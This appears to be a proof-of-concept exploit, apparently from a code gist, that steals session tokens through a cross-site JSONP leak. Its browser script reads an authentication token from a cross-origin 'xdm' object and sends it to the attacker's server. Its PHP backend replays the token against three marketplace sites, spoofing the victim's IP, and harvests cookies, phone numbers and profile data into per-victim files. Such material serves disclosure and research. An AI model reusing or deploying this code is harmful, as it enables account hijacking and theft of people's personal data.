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Created September 27, 2020 10:18
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$victim_ip_address = "";
// Function to send HTTP GET requests, returning [contents,location,cookies].
function http_get($URL, $cookies = "", $xhr=false)
global $victim_ip_address;
if ($xhr == true) {
$xhr_header="X-Requested-With: XMLHttpRequest\r\n";
// Set HTTP headers, add X-Forwarded-For header to spoof IP address...
$context = stream_context_create(
"http" => array(
'follow_location' => false,
"method" => "GET",
"header" => "X-Forwarded-For:$victim_ip_address\r\nCookie: $cookies\r\n$xhr_header"
// Process HTTP response headers...
$return_value["contents"] = file_get_contents($URL, false, $context);
$resp_cookies = [];
$return_value["location"] = $URL;
foreach ($http_response_header as $header) {
$header_pair = explode(": ", $header);
$header_name = $header_pair[0];
$header_value = $header_pair[1];
if ($header_name == "Location") {
$return_value["location"] = $header_value;
} else if ($header_name == "Set-Cookie") {
$cookie_name = explode("=", $header_value)[0];
$cookie_value = explode(";", explode("=", $header_value)[1])[0];
$resp_cookies[$cookie_name] = $cookie_value;
$return_value["cookies"] = $resp_cookies;
return $return_value;
// Function to extract sensitive information.
function ExtractContents($resp)
global $output;
$cookies = "";
$PanelURL = "";
global $phone_nums;
$name = "";
foreach ($resp["cookies"] as $cookie_name => $cookie_value) { //Check cookies...
if ($cookie_name == "ssid") {
$name = "";
$PanelURL = "";
} else if ($cookie_name == "mtsid") {
$name = "";
$PanelURL = "";
} else if ($cookie_name == "krssid") {
$name = "";
$PanelURL = "";
$phone_num_regex='/"phones" :list="\[\{(.*)\}\]"/';
$cookies .= $cookie_name . "=" . $cookie_value . ";";
$contents = http_get($PageToExtractPhoneNum, $cookies,$xhr)["contents"]; // Read pages contating phone numbers and extract them.
preg_match($phone_num_regex, $contents, $phone_num_matches); // Extract phone numbers.
if (sizeof($phone_num_matches) != 0){
$phone_nums=str_replace(['&quot;'," ","(",")",'"phones":[]','phones="[]"'],'',$phone_num_matches[0]); // Remove empty results and bad strings.
if ( $phone_nums != "") {
$output .= "User phone numbers:\n$phone_nums\n\n";
$output .= str_repeat("=", 10) . " $name " . str_repeat("=", 10)."\n\n";
$output .= "Authentication cookie: $cookies\n\n";
$contents = http_get($PanelURL, $cookies)["contents"]; // Set stolen cookies to access victim account, read user page contents.
preg_match('/window\.digitalData =.*\};/', $contents, $user_info_matches);//Extract sensitive information matching Regex.
if( sizeof($user_info_matches)!=0 ){
$user_info = $user_info_matches[0];
$output .= "User information:\n$user_info\n\n";
// Main Function
function Main()
global $victim_ip_address;
global $phone_nums;
global $output;
$victim_ip_address = $_SERVER['REMOTE_ADDR'];
if (isset($_GET['token'])) { // Authentication cookie is sent by XMLHTTPRequest.
$token = urlencode($_GET['token']);
// Send athentication token to the target websites for validation.
$market_resp = http_get("" . $token);
$kolesa_resp = http_get("" . $token);
$krisha_resp = http_get("" . $token);
// ExtractContents() function will processes responses for sensitive information.
// Token is valid, load and store sensitive information of the victim.
$success1=($market_resp["location"] == "/user/ajax-xdm-auth/");
$success2=($kolesa_resp["location"] == "/user/ajax-xdm-auth/");
$success3=($krisha_resp["location"] == "/user/ajax-xdm-auth/");
$success=($success1 && $success2 && $success3);
if ($success) {
$now = time();
$output_dir = "./$victim_ip_address/$now/"; // Create a directory based on IP address of the victim and current timestamp.
mkdir($output_dir, 0755, true);
ExtractContents($kolesa_resp); // Load and extract sensitive information.
file_put_contents("$output_dir/victim_info.txt",$output);//Save all information extracted to the output file.
} else { // Token isn't valid, redirected to the login page.
<body onload="Main()">
var tries_num = 0;
var max_tries = 30; // Try 30 times to avoid failure.
window.jQuery = window; // As JQuery script isn't loaded, we redefine it to avoid errors.
function Main() { // Main function.
function Check(xdm) { // Function handling "xdm" object loaded by JSONP.
if (tries_num == 1) {
document.body.innerText += "+ JSONP object was loaded successfully.\n\n"
var is_authenticated = xdm["sess"]["is_authenticated"]; // Extract user user authentication status from xdm object.
var token = xdm["sess"]["token"]; // Extract Authentication token from xdm object.
if (is_authenticated == 1) { // User is authenticated.
if (tries_num == 1) {
document.body.innerText += "+ You are logged in.\n\n"
document.body.innerText += "* Sending authentication token to the server...\n"
XHR_Request("token=" + encodeURIComponent(token), Check_Server_Response) // Send authentication token to the server.
} else {
document.body.innerText += "- You are not logged in!\n"
document.body.innerText += "- Please login to one of your accounts on, or and try again.\n"
function XHR_Request(data, callback) { // Function to send authentication tokens to the server.
var xhr = new XMLHttpRequest();'GET', "?" + data, true);
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
function Check_Server_Response(response) { // Function handling responses from the server.
if (response == "success") { // Server authenticated to the victim accounts successfully, token is valid.
document.body.innerText += "\n+ Success! Token is valid for authentication! (" + tries_num + "/" + max_tries + ")\n"
document.body.innerText += "+ Now an attacker can access your accounts on, and!\n"
document.body.innerText += "+ Please check files created on the server for more information.\n\n"
} else { // Server failed to access victim accounts.
document.body.innerText += "- Token was invalid.Trying again...(" + tries_num + "/" + max_tries + ")\n"
function Create_JSONP() { // Function to create and load JSONP objects.
if (tries_num == max_tries) {
document.body.innerText += "\nFailure: Could not find any valid token for authentication!";
} else if (tries_num == 0) {
document.body.innerText = "* Loading JSONP object from\n\n"
tries_num += 1
// Same-Origin Policy allows current origin to load and handle cross-origin JSONP objects.
// Create and append JSONP object loading to the document.
var JSONP = document.createElement('script');
JSONP.src = ""
// As "xdm" object is loaded by JSONP, call Check() function to check it.
JSONP.onload = function() {
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